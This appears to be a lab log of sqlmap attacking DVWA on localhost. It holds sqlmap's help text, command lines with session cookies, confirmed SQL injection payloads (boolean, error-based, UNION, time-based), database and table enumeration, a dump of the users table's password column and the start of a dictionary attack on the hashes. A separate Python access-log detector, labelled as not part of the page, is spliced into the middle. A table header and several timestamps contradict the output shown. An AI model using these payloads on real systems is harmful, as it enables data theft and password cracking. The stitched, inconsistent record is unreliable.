SQL BLIND AND SQL INJECTION DVMA
sqlmap/1.0-dev (r4009) - automatic SQL injection and database takeover tool
http://sqlmap.sourceforge.net
Usage: python ./sqlmap.py [options]
Options:
--version show program's version number and exit
-h, --help show this help message and exit
-v VERBOSE Verbosity level: 0-6 (default 1)
Target:
At least one of these options has to be specified to set the source to
get target urls from.
-d DIRECT Direct connection to the database
-u URL, --url=URL Target url
-l LOGFILE Parse targets from Burp or WebScarab proxy logs
-m BULKFILE Scan multiple targets enlisted in a given textual file
-r REQUESTFILE Load HTTP request from a file
-g GOOGLEDORK Process Google dork results as target urls
-c CONFIGFILE Load options from a configuration INI file
Request:
These options can be used to specify how to connect to the target url.
--data=DATA Data string to be sent through POST
--cookie=COOKIE HTTP Cookie header
--cookie-urlencode URL Encode generated cookie injections
--drop-set-cookie Ignore Set-Cookie header from response
--user-agent=AGENT HTTP User-Agent header
--random-agent Use randomly selected HTTP User-Agent header
--referer=REFERER HTTP Referer header
--headers=HEADERS Extra HTTP headers newline separated
--auth-type=ATYPE HTTP authentication type (Basic, Digest or NTLM)
--auth-cred=ACRED HTTP authentication credentials (name:password)
--auth-cert=ACERT HTTP authentication certificate (key_file,cert_file)
--proxy=PROXY Use a HTTP proxy to connect to the target url
--proxy-cred=PCRED HTTP proxy authentication credentials (name:password)
--ignore-proxy Ignore system default HTTP proxy
--delay=DELAY Delay in seconds between each HTTP request
--timeout=TIMEOUT Seconds to wait before timeout connection (default 30)
--retries=RETRIES Retries when the connection timeouts (default 3)
--scope=SCOPE Regexp to filter targets from provided proxy log
--safe-url=SAFURL Url address to visit frequently during testing
--safe-freq=SAFREQ Test requests between two visits to a given safe url
Optimization:
These options can be used to optimize the performance of sqlmap.
-o Turn on all optimization switches
--predict-output Predict common queries output
--keep-alive Use persistent HTTP(s) connections
--null-connection Retrieve page length without actual HTTP response body
--threads=THREADS Max number of concurrent HTTP(s) requests (default 1)
Injection:
These options can be used to specify which parameters to test for,
provide custom injection payloads and optional tampering scripts.
-p TESTPARAMETER Testable parameter(s)
--dbms=DBMS Force back-end DBMS to this value
--os=OS Force back-end DBMS operating system to this value
--prefix=PREFIX Injection payload prefix string
--suffix=SUFFIX Injection payload suffix string
--tamper=TAMPER Use given script(s) for tampering injection data
Detection:
These options can be used to specify how to parse and compare page
content from HTTP responses when using blind SQL injection technique.
--level=LEVEL Level of tests to perform (1-5, default 1)
--risk=RISK Risk of tests to perform (0-3, default 1)
--string=STRING String to match in page when the query is valid
--regexp=REGEXP Regexp to match in page when the query is valid
--text-only Compare pages based only on the textual content
Techniques:
These options can be used to tweak testing of specific SQL injection
techniques.
--technique=TECH SQL injection techniques to test for (default BEUST)
--time-sec=TIMESEC Seconds to delay the DBMS response (default 5)
--union-cols=UCOLS Range of columns to test for UNION query SQL injection
--union-char=UCHAR Character to use for bruteforcing number of columns
Fingerprint:
-f, --fingerprint Perform an extensive DBMS version fingerprint
Enumeration:
These options can be used to enumerate the back-end database
management system information, structure and data contained in the
tables. Moreover you can run your own SQL statements.
-b, --banner Retrieve DBMS banner
--current-user Retrieve DBMS current user
--current-db Retrieve DBMS current database
--is-dba Detect if the DBMS current user is DBA
--users Enumerate DBMS users
--passwords Enumerate DBMS users password hashes
--privileges Enumerate DBMS users privileges
--roles Enumerate DBMS users roles
--dbs Enumerate DBMS databases
--tables Enumerate DBMS database tables
--columns Enumerate DBMS database table columns
--schema Enumerate DBMS schema
--count Retrieve number of entries for table(s)
--dump Dump DBMS database table entries
--dump-all Dump all DBMS databases tables entries
--search Search column(s), table(s) and/or database name(s)
-D DB DBMS database to enumerate
-T TBL DBMS database table to enumerate
-C COL DBMS database table column to enumerate
-U USER DBMS user to enumerate
--exclude-sysdbs Exclude DBMS system databases when enumerating tables
--start=LIMITSTART First query output entry to retrieve
--stop=LIMITSTOP Last query output entry to retrieve
--first=FIRSTCHAR First query output word character to retrieve
--last=LASTCHAR Last query output word character to retrieve
--sql-query=QUERY SQL statement to be executed
--sql-shell Prompt for an interactive SQL shell
Brute force:
These options can be used to run brute force checks.
--common-tables Check existence of common tables
--common-columns Check existence of common columns
User-defined function injection:
These options can be used to create custom user-defined functions.
--udf-inject Inject custom user-defined functions
--shared-lib=SHLIB Local path of the shared library
File system access:
These options can be used to access the back-end database management
system underlying file system.
--file-read=RFILE Read a file from the back-end DBMS file system
--file-write=WFILE Write a local file on the back-end DBMS file system
--file-dest=DFILE Back-end DBMS absolute filepath to write to
Operating system access:
These options can be used to access the back-end database management
system underlying operating system.
--os-cmd=OSCMD Execute an operating system command
--os-shell Prompt for an interactive operating system shell
--os-pwn Prompt for an out-of-band shell, meterpreter or VNC
--os-smbrelay One click prompt for an OOB shell, meterpreter or VNC
--os-bof Stored procedure buffer overflow exploitation
--priv-esc Database process' user privilege escalation
--msf-path=MSFPATH Local path where Metasploit Framework 3 is installed
--tmp-path=TMPPATH Remote absolute path of temporary files directory
Windows registry access:
These options can be used to access the back-end database management
system Windows registry.
--reg-read Read a Windows registry key value
--reg-add Write a Windows registry key value data
--reg-del Delete a Windows registry key value
--reg-key=REGKEY Windows registry key
--reg-value=REGVAL Windows registry key value
--reg-data=REGDATA Windows registry key value data
--reg-type=REGTYPE Windows registry key value type
General:
These options can be used to set some general working parameters.
-s SESSIONFILE Save and resume all data retrieved on a session file
-t TRAFFICFILE Log all HTTP traffic into a textual file
--batch Never ask for user input, use the default behaviour
--charset=CHARSET Force character encoding used for data retrieval
--eta Display for each output the estimated time of arrival
--flush-session Flush session file for current target
--fresh-queries Ignores query results stored in session file
--save Save options on a configuration INI file
--update Update sqlmap
Miscellaneous:
--beep Alert when sql injection found
--check-payload IDS detection testing of injection payloads
--cleanup Clean up the DBMS by sqlmap specific UDF and tables
--forms Parse and test forms on target url
--gpage=GOOGLEPAGE Use Google dork results from specified page number
--mobile Imitate smartphone through HTTP User-Agent header
--page-rank Display page rank (PR) for Google dork results
--parse-errors Parse DBMS error messages from response pages
--replicate Replicate dumped data into a sqlite3 database
--tor Use default Tor (Vidalia/Privoxy/Polipo) proxy address
--wizard Simple wizard interface for beginner users
root@bt:/pentest/database/sqlmap# python sqlmap.py -u http://localhost/index.php?id=2 --dbs
root@bt:/pentest/database/sqlmap# ./sqlmap.py -u "http://localhost/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="Cookie=security=low; Xplico=brcnr5hvmiik6hltv8jatgiei2; PHPSESSID=6k9oqsq208q0j1u1qkifd26lf2" --string="Surname" --dbs
sqlmap/1.0-dev (r4009) - automatic SQL injection and database takeover tool
http://sqlmap.sourceforge.net
[*] starting at: 01:45:28
[01:45:28] [INFO] using '/pentest/database/sqlmap/output/localhost/session' as session file
[01:45:28] [INFO] testing connection to the target url
[01:45:28] [INFO] testing if the provided string is within the target URL page content
you provided an HTTP Cookie header value. The target url provided its own Cookie within the HTTP Set-Cookie header. Do you want to continue using the HTTP Cookie values that you provided? [Y/n] y
[01:45:30] [INFO] testing if GET parameter 'id' is dynamic
[01:45:30] [INFO] confirming that GET parameter 'id' is dynamic
[01:45:31] [INFO] GET parameter 'id' is dynamic
[01:45:31] [WARNING] heuristic test shows that GET parameter 'id' might not be injectable
[01:45:31] [INFO] testing sql injection on GET parameter 'id'
[01:45:31] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[01:45:31] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'
[01:45:31] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[01:45:31] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'
[01:45:31] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[01:45:31] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[01:45:31] [INFO] testing 'PostgreSQL > 8.1 stacked queries'
[01:45:31] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries'
[01:45:31] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
[01:45:31] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[01:45:31] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[01:45:31] [INFO] testing 'Oracle AND time-based blind'
[01:45:31] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[01:45:32] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[01:45:32] [WARNING] using unescaped version of the test because of zero knowledge of the back-end DBMS
[01:45:33] [WARNING] GET parameter 'id' is not injectable
[01:45:33] [INFO] testing if GET parameter 'Submit' is dynamic
[01:45:33] [WARNING] GET parameter 'Submit' appears to be not dynamic
[01:45:33] [WARNING] heuristic test shows that GET parameter 'Submit' might not be injectable
[01:45:33] [INFO] testing sql injection on GET parameter 'Submit'
[01:45:33] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[01:45:33] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'
[01:45:33] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[01:45:33] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'
[01:45:33] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[01:45:33] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[01:45:33] [INFO] testing 'PostgreSQL > 8.1 stacked queries'
[01:45:34] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries'
[01:45:34] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
[01:45:34] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[01:45:34] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[01:45:34] [INFO] testing 'Oracle AND time-based blind'
[01:45:34] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[01:45:35] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[01:45:35] [WARNING] GET parameter 'Submit' is not injectable
[01:45:35] [CRITICAL] all parameters appear to be not injectable. Try to increase --level/--risk values to perform more tests. Rerun by providing a valid --string, perhaps the string that you have choosen does not match only on True responses
[*] shutting down at: 01:45:35
root@bt:/pentest/database/sqlmap# ./sqlmap.py -u "http://localhost/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="=security=low; Xplico=brcnr5hvmiik6hltv8jatgiei2; PHPSESSID=6k9oqsq208q0j1u1qkifd26lf2" --string="Surname" --dbs
sqlmap/1.0-dev (r4009) - automatic SQL injection and database takeover tool
http://sqlmap.sourceforge.net
[*] starting at: 01:46:10
[01:46:10] [INFO] using '/pentest/database/sqlmap/output/localhost/session' as session file
[01:46:10] [INFO] testing connection to the target url
[01:46:10] [INFO] testing if the provided string is within the target URL page content
you provided an HTTP Cookie header value. The target url provided its own Cookie within the HTTP Set-Cookie header. Do you want to continue using the HTTP Cookie values that you provided? [Y/n] y
[01:46:13] [INFO] testing if GET parameter 'id' is dynamic
[01:46:13] [INFO] confirming that GET parameter 'id' is dynamic
[01:46:13] [INFO] GET parameter 'id' is dynamic
[01:46:13] [WARNING] heuristic test shows that GET parameter 'id' might not be injectable
[01:46:13] [INFO] testing sql injection on GET parameter 'id'
[01:46:13] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[01:46:13] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'
[01:46:13] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[01:46:14] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'
[01:46:14] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[01:46:14] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[01:46:14] [INFO] testing 'PostgreSQL > 8.1 stacked queries'
[01:46:14] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries'
[01:46:14] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
[01:46:14] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[01:46:14] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[01:46:14] [INFO] testing 'Oracle AND time-based blind'
[01:46:14] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[01:46:15] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[01:46:15] [WARNING] using unescaped version of the test because of zero knowledge of the back-end DBMS
[01:46:16] [WARNING] GET parameter 'id' is not injectable
[01:46:16] [INFO] testing if GET parameter 'Submit' is dynamic
[01:46:16] [WARNING] GET parameter 'Submit' appears to be not dynamic
[01:46:16] [WARNING] heuristic test shows that GET parameter 'Submit' might not be injectable
[01:46:16] [INFO] testing sql injection on GET parameter 'Submit'
[01:46:16] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[01:46:16] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'
[01:46:16] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[01:46:16] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'
[01:46:16] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[01:46:16] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[01:46:16] [INFO] testing 'PostgreSQL > 8.1 stacked queries'
[01:46:16] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries'
[01:46:16] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
[01:46:16] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[01:46:16] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[01:46:17] [INFO] testing 'Oracle AND time-based blind'
[01:46:17] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[01:46:17] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[01:46:18] [WARNING] GET parameter 'Submit' is not injectable
[01:46:18] [CRITICAL] all parameters appear to be not injectable. Try to increase --level/--risk values to perform more tests. Rerun by providing a valid --string, perhaps the string that you have choosen does not match only on True responses
[*] shutting down at: 01:46:18
root@bt:/pentest/database/sqlmap# ./sqlmap.py -u "http://localhost/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low; Xplico=brcnr5hvmiik6hltv8jatgiei2; PHPSESSID=6k9oqsq208q0j1u1qkifd26lf2" --string="Surname" --dbs
sqlmap/1.0-dev (r4009) - automatic SQL injection and database takeover tool
http://sqlmap.sourceforge.net
[*] starting at: 01:46:31
[01:46:31] [INFO] using '/pentest/database/sqlmap/output/localhost/session' as session file
[01:46:31] [INFO] testing connection to the target url
[01:46:31] [INFO] testing if the provided string is within the target URL page content
[01:46:31] [INFO] testing if GET parameter 'id' is dynamic
[01:46:31] [INFO] confirming that GET parameter 'id' is dynamic
[01:46:31] [INFO] GET parameter 'id' is dynamic
[01:46:32] [INFO] heuristics detected web page charset 'ascii'
[01:46:32] [INFO] heuristic test shows that GET parameter 'id' might be injectable (possible DBMS: MySQL)
[01:46:32] [INFO] testing sql injection on GET parameter 'id'
[01:46:32] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[01:46:32] [INFO] GET parameter 'id' is 'AND boolean-based blind - WHERE or HAVING clause' injectable
[01:46:32] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'
[01:46:32] [INFO] GET parameter 'id' is 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause' injectable
[01:46:32] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[01:46:32] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
[01:46:42] [INFO] GET parameter 'id' is 'MySQL > 5.0.11 AND time-based blind' injectable
[01:46:42] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[01:46:42] [INFO] target url appears to be UNION injectable with 2 columns
[01:46:42] [INFO] GET parameter 'id' is 'MySQL UNION query (NULL) - 1 to 10 columns' injectable
GET parameter 'id' is vulnerable. Do you want to keep testing the others? [y/N] y
[01:46:45] [INFO] testing if GET parameter 'Submit' is dynamic
[01:46:45] [WARNING] GET parameter 'Submit' appears to be not dynamic
[01:46:45] [WARNING] heuristic test shows that GET parameter 'Submit' might not be injectable
[01:46:45] [INFO] testing sql injection on GET parameter 'Submit'
[01:46:45] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[01:46:45] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'
[01:46:46] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[01:46:46] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
parsed error message(s) showed that the back-end DBMS could be MySQL. Do you want to skip test payloads specific for other DBMSes? [Y/n] y
[01:46:48] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[01:46:49] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[01:46:49] [WARNING] GET parameter 'Submit' is not injectable
sqlmap identified the following injection points with a total of 133 HTTP(s) requests:
---
Place: GET
Parameter: id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=1' AND 9643=9643 AND 'KTii'='KTii&Submit=Submit
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: id=1' AND (SELECT 8718 FROM(SELECT COUNT(*),CONCAT(CHAR(58,112,120,122,58),(SELECT (CASE WHEN (8718=8718) THEN 1 ELSE 0 END)),CHAR(58,107,121,122,58),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'sDog'='sDog&Submit=Submit
Type: UNION query
Title: MySQL UNION query (NULL) - 1 to 10 columns
Payload: id=1' UNION ALL SELECT NULL, CONCAT(CHAR(58,112,120,122,58),IFNULL(CAST(CHAR(71,112,86,100,86,119,116,88,106,73) AS CHAR),CHAR(32)),CHAR(58,107,121,122,58))# AND 'OaVB'='OaVB&Submit=Submit
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: id=1' AND SLEEP(5) AND 'nCjY'='nCjY&Submit=Submit
---
[01:46:49] [INFO] manual usage of GET payloads requires url encoding
[01:46:49] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 10.04 (Lucid Lynx)
web application technology: PHP 5.3.2, Apache 2.2.14
back-end DBMS: MySQL 5.0
[01:46:49] [INFO] fetching database names
available databases [4]:
[*] dvwa
[*] fbip
[*] information_schema
[*] mysql
[01:46:50] [INFO] Fetched data logged to text files under '/pentest/database/sqlmap/output/localhost'
[*] shutting down at: 01:46:50
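The injection-point summary above lists four payload shapes sqlmap confirmed against the `id` parameter: boolean-based blind, error-based, UNION query and time-based blind. As an added defender-side example (not part of the page and not sqlmap's own code), the following Python classifies constructed Apache-style access-log lines by those same shapes; the regular expressions are assumptions derived from the payloads printed above, and the log lines are constructed for the example.

```python
"""Classify web-server access-log lines by the sqlmap injection technique
they resemble. Signatures follow the four payload types sqlmap reported
against DVWA's id parameter (boolean-based blind, error-based, UNION query,
time-based blind). Added example; assumptions, not sqlmap's own signatures."""
from __future__ import annotations
import re
from urllib.parse import unquote_plus, urlsplit

# Each signature is keyed by the "Type:" label sqlmap printed for the payload.
SIGNATURES = {
    # id=1' AND 9643=9643 AND 'KTii'='KTii  -> a number compared with itself
    "boolean-based blind": re.compile(r"\bAND\s+(\d+)=\1\b", re.I),
    # FLOOR(RAND(0)*2) ... GROUP BY is the duplicate-key error trick
    "error-based": re.compile(r"FLOOR\(RAND\(0\)\*2\).*?GROUP\s+BY", re.I | re.S),
    # id=1' UNION ALL SELECT NULL, CONCAT(...)#
    "UNION query": re.compile(r"\bUNION\s+ALL\s+SELECT\b", re.I),
    # id=1' AND SLEEP(5) -> --time-sec default is 5 seconds
    "time-based blind": re.compile(r"\bSLEEP\(\s*\d+\s*\)", re.I),
}
# Closing tautology sqlmap appends so the opening quote still balances.
TAUTOLOGY = re.compile(r"'(\w+)'='\1\b")

REQUEST_RE = re.compile(r'"(?:GET|POST)\s+(\S+)\s+HTTP/[\d.]+"')


def decoded_query(log_line: str) -> str:
    """Return the URL-decoded query string of the logged request, or ''."""
    m = REQUEST_RE.search(log_line)
    if not m:
        return ""
    # sqlmap notes that manual use of GET payloads needs URL encoding, so the
    # logged form is encoded; unquote_plus turns %27 back into ' and so on.
    return unquote_plus(urlsplit(m.group(1)).query)


def classify(log_line: str) -> list[str]:
    """Technique names (sqlmap's own labels) whose signature hits the line."""
    query = decoded_query(log_line)
    hits = [name for name, rx in SIGNATURES.items() if rx.search(query)]
    if TAUTOLOGY.search(query):
        hits.append("sqlmap tautology suffix")
    return hits


def report(lines) -> dict[int, list[str]]:
    """Line index -> matched techniques, for every line that tripped a signature."""
    found = {}
    for i, line in enumerate(lines):
        hits = classify(line)
        if hits:
            found[i] = hits
    return found


# Constructed Apache-style access-log lines (not from the page's session).
# Queries are URL-encoded copies, one of them shortened, of the payloads above.
PFX = '127.0.0.1 - - [15/Jan/2012:01:46:32 +0000] "GET /dvwa/vulnerabilities/sqli/?'
SAMPLE_LOG = [
    PFX + 'id=1&Submit=Submit HTTP/1.1" 200 4621',
    PFX + 'id=1%27%20AND%209643%3D9643%20AND%20%27KTii%27%3D%27KTii&Submit=Submit HTTP/1.1" 200 4621',
    PFX + 'id=1%27%20AND%20%28SELECT%208718%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%28CHAR%2858%2C112%2C120%2C122%2C58%29%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20AND%20%27sDog%27%3D%27sDog&Submit=Submit HTTP/1.1" 200 4702',
    PFX + 'id=1%27%20UNION%20ALL%20SELECT%20NULL%2C%20CONCAT%28CHAR%2858%2C112%2C120%2C122%2C58%29%29%23%20AND%20%27OaVB%27%3D%27OaVB&Submit=Submit HTTP/1.1" 200 4655',
    PFX + 'id=1%27%20AND%20SLEEP%285%29%20AND%20%27nCjY%27%3D%27nCjY&Submit=Submit HTTP/1.1" 200 4621',
    PFX + 'name=O%27Brien&Submit=Submit HTTP/1.1" 200 4621',
]

if __name__ == "__main__":
    for idx, hits in report(SAMPLE_LOG).items():
        print(f"line {idx}: {', '.join(hits)}")
```

Matching on the default `sqlmap/...` User-Agent alone is a weaker signal, because the `--user-agent` and `--random-agent` options listed above replace it; the request shape survives that.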
Scan DataBase in folder DVWA
root@bt:/pentest/database/sqlmap# ./sqlmap.py -u "http://localhost/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low;PHPSESSID=q80smbhbrekp79b2usal4qdie2" -D dvwa --tables
sqlmap/1.0-dev (r4009) - automatic SQL injection and database takeover tool
http://sqlmap.sourceforge.net
[*] starting at: 01:46:50
[01:46:50] [INFO] using '/pentest/database/sqlmap/output/localhost/session' as session file
[01:46:50] [INFO] resuming injection data from session file
[01:46:50] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
[01:46:50] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=1' AND 4926=4926 AND 'oAKM'='oAKM&Submit=Submit
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: id=1' AND (SELECT 7854 FROM(SELECT COUNT(*),CONCAT(CHAR(58,118,120,114,58),(SELECT (CASE WHEN (7854=7854) THEN 1 ELSE 0 END)),CHAR(58,108,105,107,58),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'QJaM'='QJaM&Submit=Submit
Type: UNION query
Title: MySQL UNION query (NULL) - 1 to 10 columns
Payload: id=1' UNION ALL SELECT CONCAT(CHAR(58,118,120,114,58),IFNULL(CAST(CHAR(89,99,107,68,77,66,97,111,66,86) AS CHAR),CHAR(32)),CHAR(58,108,105,107,58)), NULL# AND 'vSNt'='vSNt&Submit=Submit
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: id=1' AND SLEEP(5) AND 'LOdF'='LOdF&Submit=Submit
---
[01:46:50] [INFO] manual usage of GET payloads requires url encoding
[01:46:50] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 10.04 (Lucid Lynx)
web application technology: PHP 5.3.2, Apache 2.2.14
back-end DBMS: MySQL 5.0
[01:46:50] [INFO] fetching tables for database: dvwa
Database: dvwa
[2 tables]
+-----------+
| guestbook |
| users     |
+-----------+
[01:46:50] [INFO] Fetched data logged to text files under '/pentest/database/sqlmap/output/localhost'
[*] shutting down at: 00:42:45
root@bt:/pentest/database/sqlmap# ./sqlmap.py -u "http://localhost/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low;PHPSESSID=q80smbhbrekp79b2usal4qdie2" -D dvwa -T users --columns
sqlmap/1.0-dev (r4009) - automatic SQL injection and database takeover tool
http://sqlmap.sourceforge.net
[*] starting at: 01:46:51
[01:46:51] [INFO] using '/pentest/database/sqlmap/output/localhost/session' as session file
[01:46:51] [INFO] resuming injection data from session file
[01:46:51] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
[01:46:51] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=1' AND 4926=4926 AND 'oAKM'='oAKM&Submit=Submit
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: id=1' AND (SELECT 7854 FROM(SELECT COUNT(*),CONCAT(CHAR(58,118,120,114,58),(SELECT (CASE WHEN (7854=7854) THEN 1 ELSE 0 END)),CHAR(58,108,105,107,58),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'QJaM'='QJaM&Submit=Submit
Type: UNION query
Title: MySQL UNION query (NULL) - 1 to 10 columns
Payload: id=1' UNION ALL SELECT CONCAT(CHAR(58,118,120,114,58),IFNULL(CAST(CHAR(89,99,107,68,77,66,97,111,66,86) AS CHAR),CHAR(32)),CHAR(58,108,105,107,58)), NULL# AND 'vSNt'='vSNt&Submit=Submit
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: id=1' AND SLEEP(5) AND 'LOdF'='LOdF&Submit=Submit
---
[00:44:35] [INFO] manual usage of GET payloads requires url encoding
[00:44:35] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 10.04 (Lucid Lynx)
web application technology: PHP 5.3.2, Apache 2.2.14
back-end DBMS: MySQL 5.0
[00:44:35] [INFO] fetching columns for table 'users' on database 'dvwa'
Database: dvwa
Table: users
[6 columns]
+------------+-------------+
| Column     | Type        |
+------------+-------------+
| first_name | varchar(15) |
| last_name  | varchar(15) |
| password   | varchar(32) |
| user       | varchar(15) |
| user_id    | int(6)      |
+------------+-------------+
[00:44:35] [INFO] Fetched data logged to text files under '/pentest/database/sqlmap/output/localhost'
[*] shutting down at: 01:46:53
root@bt:/pentest/database/sqlmap# ./sqlmap.py -u "http://localhost/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low;PHPSESSID=q80smbhbrekp79b2usal4qdie2" -D dvwa -T users -C password --dump
sqlmap/1.0-dev (r4009) - automatic SQL injection and database takeover tool
http://sqlmap.sourceforge.net
[*] starting at: 01:46:53
[01:46:53] [INFO] using '/pentest/database/sqlmap/output/localhost/session' as session file
[01:46:53] [INFO] resuming injection data from session file
[01:46:53] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
[01:46:53] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=1' AND 4926=4926 AND 'oAKM'='oAKM&Submit=Submit
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: id=1' AND (SELECT 7854 FROM(SELECT COUNT(*),CONCAT(CHAR(58,118,120,114,58),(SELECT (CASE WHEN (7854=7854) THEN 1 ELSE 0 END)),CHAR(58,108,105,107,58),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'QJaM'='QJaM&Submit=Submit
Type: UNION query
Title: MySQL UNION query (NULL) - 1 to 10 columns
Payload: id=1' UNION ALL SELECT CONCAT(CHAR(58,118,120,114,58),IFNULL(CAST(CHAR(89,99,107,68,77,66,97,111,66,86) AS CHAR),CHAR(32)),CHAR(58,108,105,107,58)), NULL# AND 'vSNt'='vSNt&Submit=Submit
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: id=1' AND SLEEP(5) AND 'LOdF'='LOdF&Submit=Submit
---
[01:46:53] [INFO] manual usage of GET payloads requires url encoding
[01:46:53] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 10.04 (Lucid Lynx)
web application technology: PHP 5.3.2, Apache 2.2.14
back-end DBMS: MySQL 5.0
do you want to use LIKE operator to retrieve column names similar to the ones provided with the -C option? [Y/n] y
[01:46:54] [INFO] fetching columns LIKE 'password' for table 'users' on database 'dvwa'
[01:46:54] [INFO] fetching column(s) 'password' entries for table 'users' on database 'dvwa'
recognized possible password hash values. do you want to use dictionary attack on retrieved table items? [Y/n/q] y
[01:46:55] [INFO] using hash method: 'md5_generic_passwd'
what's the dictionary's location? [/pentest/database/sqlmap/txt/wordlist.txt]
[01:46:58] [INFO] loading dictionary from: '/pentest/database/sqlmap/txt/wordlist.txt'
do you want to use common password suffixes? (slow!) [y/N] y
[01:46:58] [INFO] starting dictionary attack (md5_generic_passwd)
